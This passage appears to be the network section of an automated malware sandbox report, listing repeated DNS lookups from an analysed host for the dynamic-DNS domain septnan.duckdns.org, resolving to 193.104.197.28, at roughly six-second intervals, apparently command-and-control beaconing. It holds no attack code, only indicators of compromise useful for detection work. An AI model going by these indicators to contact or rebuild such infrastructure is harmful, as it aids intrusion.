            Sep 27, 2021 13:11:45.956171036 CEST5439853192.168.11.208.8.8.8
            Sep 27, 2021 13:11:45.966579914 CEST53543988.8.8.8192.168.11.20
            Sep 27, 2021 13:11:51.835200071 CEST6239053192.168.11.208.8.8.8
            Sep 27, 2021 13:11:51.939726114 CEST53623908.8.8.8192.168.11.20
            Sep 27, 2021 13:11:57.901463032 CEST5959953192.168.11.208.8.8.8
            Sep 27, 2021 13:11:58.005121946 CEST53595998.8.8.8192.168.11.20
            Sep 27, 2021 13:12:03.853627920 CEST4918653192.168.11.208.8.8.8
            Sep 27, 2021 13:12:03.864195108 CEST53491868.8.8.8192.168.11.20
            Sep 27, 2021 13:12:09.781666994 CEST5420853192.168.11.208.8.8.8
            Sep 27, 2021 13:12:09.887578964 CEST53542088.8.8.8192.168.11.20
            Sep 27, 2021 13:12:15.829859972 CEST5144253192.168.11.208.8.8.8
            Sep 27, 2021 13:12:15.935296059 CEST53514428.8.8.8192.168.11.20
            Sep 27, 2021 13:12:21.828773022 CEST5087653192.168.11.208.8.8.8
            Sep 27, 2021 13:12:21.934163094 CEST53508768.8.8.8192.168.11.20
            Sep 27, 2021 13:12:27.827327013 CEST5480453192.168.11.208.8.8.8
            Sep 27, 2021 13:12:27.835988998 CEST53548048.8.8.8192.168.11.20
            Sep 27, 2021 13:12:33.748680115 CEST6177953192.168.11.208.8.8.8
            Sep 27, 2021 13:12:33.758888960 CEST53617798.8.8.8192.168.11.20
            Sep 27, 2021 13:12:37.519500017 CEST5419553192.168.11.201.1.1.1
            Sep 27, 2021 13:12:37.527776003 CEST53541951.1.1.1192.168.11.20
            Sep 27, 2021 13:12:39.605915070 CEST6246553192.168.11.208.8.8.8
            Sep 27, 2021 13:12:39.710177898 CEST53624658.8.8.8192.168.11.20
            Sep 27, 2021 13:12:45.639002085 CEST6163853192.168.11.208.8.8.8
            Sep 27, 2021 13:12:45.649583101 CEST53616388.8.8.8192.168.11.20
            Sep 27, 2021 13:12:51.573220015 CEST6327253192.168.11.208.8.8.8
            Sep 27, 2021 13:12:51.583744049 CEST53632728.8.8.8192.168.11.20
            Sep 27, 2021 13:12:57.483577013 CEST6086553192.168.11.208.8.8.8
            Sep 27, 2021 13:12:57.494263887 CEST53608658.8.8.8192.168.11.20
            Sep 27, 2021 13:13:03.403306007 CEST5951453192.168.11.208.8.8.8
            Sep 27, 2021 13:13:03.509613991 CEST53595148.8.8.8192.168.11.20
            Sep 27, 2021 13:13:09.405898094 CEST6125453192.168.11.208.8.8.8
            Sep 27, 2021 13:13:09.509421110 CEST53612548.8.8.8192.168.11.20
            Sep 27, 2021 13:13:15.384571075 CEST6232853192.168.11.208.8.8.8
            Sep 27, 2021 13:13:15.491085052 CEST53623288.8.8.8192.168.11.20
            Sep 27, 2021 13:13:21.393913031 CEST6461753192.168.11.208.8.8.8
            Sep 27, 2021 13:13:21.498322010 CEST53646178.8.8.8192.168.11.20
            Sep 27, 2021 13:13:27.407892942 CEST5492553192.168.11.208.8.8.8
            Sep 27, 2021 13:13:27.418514013 CEST53549258.8.8.8192.168.11.20
            Sep 27, 2021 13:13:33.304049015 CEST5034953192.168.11.208.8.8.8
            Sep 27, 2021 13:13:33.312573910 CEST53503498.8.8.8192.168.11.20
            Sep 27, 2021 13:13:39.233575106 CEST6080253192.168.11.208.8.8.8
            Sep 27, 2021 13:13:39.339880943 CEST53608028.8.8.8192.168.11.20
            Sep 27, 2021 13:13:45.232558966 CEST5522153192.168.11.208.8.8.8
            Sep 27, 2021 13:13:45.338635921 CEST53552218.8.8.8192.168.11.20
            Sep 27, 2021 13:13:51.278652906 CEST6419053192.168.11.208.8.8.8
            Sep 27, 2021 13:13:51.287478924 CEST53641908.8.8.8192.168.11.20
            Sep 27, 2021 13:13:57.198163033 CEST5170553192.168.11.208.8.8.8
            Sep 27, 2021 13:13:57.208452940 CEST53517058.8.8.8192.168.11.20
            Sep 27, 2021 13:14:03.073358059 CEST5634953192.168.11.208.8.8.8
            Sep 27, 2021 13:14:03.083504915 CEST53563498.8.8.8192.168.11.20
            Sep 27, 2021 13:14:08.962410927 CEST5908553192.168.11.208.8.8.8
            Sep 27, 2021 13:14:09.067140102 CEST53590858.8.8.8192.168.11.20
            Sep 27, 2021 13:14:14.983581066 CEST6370053192.168.11.208.8.8.8
            Sep 27, 2021 13:14:15.088684082 CEST53637008.8.8.8192.168.11.20
            Sep 27, 2021 13:14:20.995127916 CEST5733453192.168.11.208.8.8.8
            Sep 27, 2021 13:14:21.003551006 CEST53573348.8.8.8192.168.11.20
            Sep 27, 2021 13:14:26.895266056 CEST5358753192.168.11.208.8.8.8
            Sep 27, 2021 13:14:26.903696060 CEST53535878.8.8.8192.168.11.20
            Sep 27, 2021 13:14:32.831068993 CEST5023953192.168.11.208.8.8.8
            Sep 27, 2021 13:14:32.936021090 CEST53502398.8.8.8192.168.11.20
            Sep 27, 2021 13:14:38.849893093 CEST6171153192.168.11.208.8.8.8
            Sep 27, 2021 13:14:38.955168009 CEST53617118.8.8.8192.168.11.20
            Sep 27, 2021 13:14:44.828272104 CEST5364453192.168.11.208.8.8.8
            Sep 27, 2021 13:14:44.839030981 CEST53536448.8.8.8192.168.11.20
            Sep 27, 2021 13:14:50.734926939 CEST6189453192.168.11.208.8.8.8
            Sep 27, 2021 13:14:50.839839935 CEST53618948.8.8.8192.168.11.20
            Sep 27, 2021 13:14:56.748138905 CEST5113753192.168.11.208.8.8.8
            Sep 27, 2021 13:14:56.758558989 CEST53511378.8.8.8192.168.11.20
            Sep 27, 2021 13:15:02.636961937 CEST6151853192.168.11.208.8.8.8
            Sep 27, 2021 13:15:02.647368908 CEST53615188.8.8.8192.168.11.20
            Sep 27, 2021 13:15:08.564913034 CEST6261753192.168.11.208.8.8.8
            Sep 27, 2021 13:15:08.575143099 CEST53626178.8.8.8192.168.11.20
            Sep 27, 2021 13:15:14.463769913 CEST6501553192.168.11.208.8.8.8
            Sep 27, 2021 13:15:14.474417925 CEST53650158.8.8.8192.168.11.20
            Sep 27, 2021 13:15:20.353022099 CEST6550953192.168.11.208.8.8.8
            Sep 27, 2021 13:15:20.458604097 CEST53655098.8.8.8192.168.11.20
            Sep 27, 2021 13:15:26.372798920 CEST4934053192.168.11.208.8.8.8
            Sep 27, 2021 13:15:26.383125067 CEST53493408.8.8.8192.168.11.20
            Sep 27, 2021 13:15:32.275186062 CEST6506753192.168.11.208.8.8.8
            Sep 27, 2021 13:15:32.286077023 CEST53650678.8.8.8192.168.11.20
            Sep 27, 2021 13:15:38.222755909 CEST6121253192.168.11.208.8.8.8
            Sep 27, 2021 13:15:38.328910112 CEST53612128.8.8.8192.168.11.20
            Sep 27, 2021 13:15:43.355546951 CEST5467253192.168.11.201.1.1.1
            Sep 27, 2021 13:15:43.365478039 CEST53546721.1.1.1192.168.11.20
            Sep 27, 2021 13:15:43.752876043 CEST6455453192.168.11.201.1.1.1
            Sep 27, 2021 13:15:43.761097908 CEST53645541.1.1.1192.168.11.20
            Sep 27, 2021 13:15:44.221508026 CEST6037753192.168.11.208.8.8.8
            Sep 27, 2021 13:15:44.232429981 CEST53603778.8.8.8192.168.11.20
            Sep 27, 2021 13:15:50.143318892 CEST4951053192.168.11.208.8.8.8
            Sep 27, 2021 13:15:50.151885986 CEST53495108.8.8.8192.168.11.20
            Sep 27, 2021 13:15:56.046739101 CEST6471653192.168.11.208.8.8.8
            Sep 27, 2021 13:15:56.152004004 CEST53647168.8.8.8192.168.11.20
            Sep 27, 2021 13:16:02.076811075 CEST5721753192.168.11.208.8.8.8
            Sep 27, 2021 13:16:02.087193966 CEST53572178.8.8.8192.168.11.20
            Sep 27, 2021 13:16:07.691649914 CEST5319853192.168.11.201.1.1.1
            Sep 27, 2021 13:16:07.700190067 CEST53531981.1.1.1192.168.11.20
            Sep 27, 2021 13:16:07.951993942 CEST5696553192.168.11.208.8.8.8
            Sep 27, 2021 13:16:08.058150053 CEST53569658.8.8.8192.168.11.20
            Sep 27, 2021 13:16:13.980340958 CEST5406453192.168.11.208.8.8.8
            Sep 27, 2021 13:16:14.085480928 CEST53540648.8.8.8192.168.11.20
            Sep 27, 2021 13:16:19.965143919 CEST5514753192.168.11.208.8.8.8
            Sep 27, 2021 13:16:19.976174116 CEST53551478.8.8.8192.168.11.20
            Sep 27, 2021 13:16:25.852906942 CEST5820653192.168.11.208.8.8.8
            Sep 27, 2021 13:16:25.958165884 CEST53582068.8.8.8192.168.11.20
            Sep 27, 2021 13:16:31.884470940 CEST5046453192.168.11.208.8.8.8
            Sep 27, 2021 13:16:31.894812107 CEST53504648.8.8.8192.168.11.20
            Sep 27, 2021 13:16:37.834356070 CEST6457653192.168.11.208.8.8.8
            Sep 27, 2021 13:16:37.842606068 CEST53645768.8.8.8192.168.11.20
            Sep 27, 2021 13:16:43.728779078 CEST6349853192.168.11.208.8.8.8
            Sep 27, 2021 13:16:43.832395077 CEST53634988.8.8.8192.168.11.20
            Sep 27, 2021 13:16:49.753757000 CEST5812853192.168.11.208.8.8.8
            Sep 27, 2021 13:16:49.764617920 CEST53581288.8.8.8192.168.11.20
            Sep 27, 2021 13:16:55.719767094 CEST5724153192.168.11.208.8.8.8
            Sep 27, 2021 13:16:55.729880095 CEST53572418.8.8.8192.168.11.20

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            Sep 27, 2021 13:09:20.034782887 CEST192.168.11.208.8.8.80xf23aStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:09:26.591469049 CEST192.168.11.208.8.8.80x1c2bStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:09:32.638530016 CEST192.168.11.208.8.8.80x4176Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:09:38.740026951 CEST192.168.11.208.8.8.80xbc38Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:09:44.941082001 CEST192.168.11.208.8.8.80x3b96Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:09:51.339694977 CEST192.168.11.208.8.8.80x5759Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:09:57.851999998 CEST192.168.11.208.8.8.80x247fStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:10:04.031630039 CEST192.168.11.208.8.8.80x67e5Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:10:10.683502913 CEST192.168.11.208.8.8.80xce86Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:10:16.814394951 CEST192.168.11.208.8.8.80xe3b4Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:10:22.655458927 CEST192.168.11.208.8.8.80x119Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:10:28.574254990 CEST192.168.11.208.8.8.80x413dStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:10:34.532900095 CEST192.168.11.208.8.8.80xff42Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:10:40.433029890 CEST192.168.11.208.8.8.80x4a04Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:10:46.444910049 CEST192.168.11.208.8.8.80xeab8Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:10:52.400047064 CEST192.168.11.208.8.8.80x5850Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:10:58.393814087 CEST192.168.11.208.8.8.80x9e8aStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:11:04.252420902 CEST192.168.11.208.8.8.80x794cStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:11:10.336045027 CEST192.168.11.208.8.8.80x5cdbStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:11:16.297339916 CEST192.168.11.208.8.8.80x6964Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:11:22.301470041 CEST192.168.11.208.8.8.80x93fdStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:11:28.237009048 CEST192.168.11.208.8.8.80x5eb9Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:11:34.174585104 CEST192.168.11.208.8.8.80xd5a6Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:11:40.040515900 CEST192.168.11.208.8.8.80x8448Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:11:45.956171036 CEST192.168.11.208.8.8.80x154dStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:11:51.835200071 CEST192.168.11.208.8.8.80x47beStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:11:57.901463032 CEST192.168.11.208.8.8.80x91bbStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:12:03.853627920 CEST192.168.11.208.8.8.80xb049Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:12:09.781666994 CEST192.168.11.208.8.8.80xc0ceStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:12:15.829859972 CEST192.168.11.208.8.8.80x2e98Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:12:21.828773022 CEST192.168.11.208.8.8.80x519eStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:12:27.827327013 CEST192.168.11.208.8.8.80x404eStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:12:33.748680115 CEST192.168.11.208.8.8.80x7aa1Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:12:39.605915070 CEST192.168.11.208.8.8.80x5000Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:12:45.639002085 CEST192.168.11.208.8.8.80x28ffStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:12:51.573220015 CEST192.168.11.208.8.8.80xf63Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:12:57.483577013 CEST192.168.11.208.8.8.80x601fStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:13:03.403306007 CEST192.168.11.208.8.8.80x28c7Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:13:09.405898094 CEST192.168.11.208.8.8.80xd274Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:13:15.384571075 CEST192.168.11.208.8.8.80x5e13Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:13:21.393913031 CEST192.168.11.208.8.8.80xded9Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:13:27.407892942 CEST192.168.11.208.8.8.80x95edStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:13:33.304049015 CEST192.168.11.208.8.8.80x4431Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:13:39.233575106 CEST192.168.11.208.8.8.80x2130Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:13:45.232558966 CEST192.168.11.208.8.8.80xd16dStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:13:51.278652906 CEST192.168.11.208.8.8.80x99c6Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:13:57.198163033 CEST192.168.11.208.8.8.80xa6a8Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:14:03.073358059 CEST192.168.11.208.8.8.80x4868Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:14:08.962410927 CEST192.168.11.208.8.8.80xdd96Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:14:14.983581066 CEST192.168.11.208.8.8.80x4027Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:14:20.995127916 CEST192.168.11.208.8.8.80x2735Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:14:26.895266056 CEST192.168.11.208.8.8.80x641aStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:14:32.831068993 CEST192.168.11.208.8.8.80x6a3bStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:14:38.849893093 CEST192.168.11.208.8.8.80x8c67Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:14:44.828272104 CEST192.168.11.208.8.8.80xaa9eStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:14:50.734926939 CEST192.168.11.208.8.8.80x9443Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:14:56.748138905 CEST192.168.11.208.8.8.80xe6f3Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:15:02.636961937 CEST192.168.11.208.8.8.80xc28dStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:15:08.564913034 CEST192.168.11.208.8.8.80x56abStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:15:14.463769913 CEST192.168.11.208.8.8.80x940dStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:15:20.353022099 CEST192.168.11.208.8.8.80xc2b3Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:15:26.372798920 CEST192.168.11.208.8.8.80x2796Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:15:32.275186062 CEST192.168.11.208.8.8.80x7a2aStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:15:38.222755909 CEST192.168.11.208.8.8.80xb3eStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:15:44.221508026 CEST192.168.11.208.8.8.80x87e2Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:15:50.143318892 CEST192.168.11.208.8.8.80xb887Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:15:56.046739101 CEST192.168.11.208.8.8.80xe431Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:16:02.076811075 CEST192.168.11.208.8.8.80xb186Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:16:07.951993942 CEST192.168.11.208.8.8.80x8fbeStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:16:13.980340958 CEST192.168.11.208.8.8.80x5be9Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:16:19.965143919 CEST192.168.11.208.8.8.80xd39Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:16:25.852906942 CEST192.168.11.208.8.8.80x728dStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:16:31.884470940 CEST192.168.11.208.8.8.80xe77aStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:16:37.834356070 CEST192.168.11.208.8.8.80xf6cdStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:16:43.728779078 CEST192.168.11.208.8.8.80x18ecStandard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:16:49.753757000 CEST192.168.11.208.8.8.80x1478Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)
            Sep 27, 2021 13:16:55.719767094 CEST192.168.11.208.8.8.80xa444Standard query (0)septnan.duckdns.orgA (IP address)IN (0x0001)

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            Sep 27, 2021 13:08:29.021394014 CEST1.1.1.1192.168.11.200xdc61No error (0)devcenterapi.azure-api.netapimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.netCNAME (Canonical name)IN (0x0001)
            Sep 27, 2021 13:08:29.021394014 CEST1.1.1.1192.168.11.200xdc61No error (0)devcenterapi-eastus-01.regional.azure-api.netapimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.netCNAME (Canonical name)IN (0x0001)
            Sep 27, 2021 13:09:20.137820005 CEST8.8.8.8192.168.11.200xf23aNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:09:26.601703882 CEST8.8.8.8192.168.11.200x1c2bNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:09:32.745477915 CEST8.8.8.8192.168.11.200x4176No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:09:38.845324039 CEST8.8.8.8192.168.11.200xbc38No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:09:45.048055887 CEST8.8.8.8192.168.11.200x3b96No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:09:51.442729950 CEST8.8.8.8192.168.11.200x5759No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:09:57.956847906 CEST8.8.8.8192.168.11.200x247fNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:10:04.136420012 CEST8.8.8.8192.168.11.200x67e5No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:10:10.693938017 CEST8.8.8.8192.168.11.200xce86No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:10:16.825088024 CEST8.8.8.8192.168.11.200xe3b4No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:10:22.665482998 CEST8.8.8.8192.168.11.200x119No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:10:28.680428982 CEST8.8.8.8192.168.11.200x413dNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:10:34.543570995 CEST8.8.8.8192.168.11.200xff42No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:10:40.538957119 CEST8.8.8.8192.168.11.200x4a04No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:10:46.455328941 CEST8.8.8.8192.168.11.200xeab8No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:10:52.506231070 CEST8.8.8.8192.168.11.200x5850No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:10:58.404175997 CEST8.8.8.8192.168.11.200x9e8aNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:11:04.357707977 CEST8.8.8.8192.168.11.200x794cNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:11:10.442099094 CEST8.8.8.8192.168.11.200x5cdbNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:11:16.403731108 CEST8.8.8.8192.168.11.200x6964No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:11:22.310287952 CEST8.8.8.8192.168.11.200x93fdNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:11:28.245814085 CEST8.8.8.8192.168.11.200x5eb9No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:11:34.183361053 CEST8.8.8.8192.168.11.200xd5a6No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:11:40.048793077 CEST8.8.8.8192.168.11.200x8448No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:11:45.966579914 CEST8.8.8.8192.168.11.200x154dNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:11:51.939726114 CEST8.8.8.8192.168.11.200x47beNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:11:58.005121946 CEST8.8.8.8192.168.11.200x91bbNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:12:03.864195108 CEST8.8.8.8192.168.11.200xb049No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:12:09.887578964 CEST8.8.8.8192.168.11.200xc0ceNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:12:15.935296059 CEST8.8.8.8192.168.11.200x2e98No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:12:21.934163094 CEST8.8.8.8192.168.11.200x519eNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:12:27.835988998 CEST8.8.8.8192.168.11.200x404eNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:12:33.758888960 CEST8.8.8.8192.168.11.200x7aa1No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:12:39.710177898 CEST8.8.8.8192.168.11.200x5000No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:12:45.649583101 CEST8.8.8.8192.168.11.200x28ffNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:12:51.583744049 CEST8.8.8.8192.168.11.200xf63No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:12:57.494263887 CEST8.8.8.8192.168.11.200x601fNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:13:03.509613991 CEST8.8.8.8192.168.11.200x28c7No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:13:09.509421110 CEST8.8.8.8192.168.11.200xd274No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:13:15.491085052 CEST8.8.8.8192.168.11.200x5e13No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:13:21.498322010 CEST8.8.8.8192.168.11.200xded9No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:13:27.418514013 CEST8.8.8.8192.168.11.200x95edNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:13:33.312573910 CEST8.8.8.8192.168.11.200x4431No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:13:39.339880943 CEST8.8.8.8192.168.11.200x2130No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:13:45.338635921 CEST8.8.8.8192.168.11.200xd16dNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:13:51.287478924 CEST8.8.8.8192.168.11.200x99c6No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:13:57.208452940 CEST8.8.8.8192.168.11.200xa6a8No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:14:03.083504915 CEST8.8.8.8192.168.11.200x4868No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:14:09.067140102 CEST8.8.8.8192.168.11.200xdd96No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:14:15.088684082 CEST8.8.8.8192.168.11.200x4027No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:14:21.003551006 CEST8.8.8.8192.168.11.200x2735No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:14:26.903696060 CEST8.8.8.8192.168.11.200x641aNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:14:32.936021090 CEST8.8.8.8192.168.11.200x6a3bNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:14:38.955168009 CEST8.8.8.8192.168.11.200x8c67No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
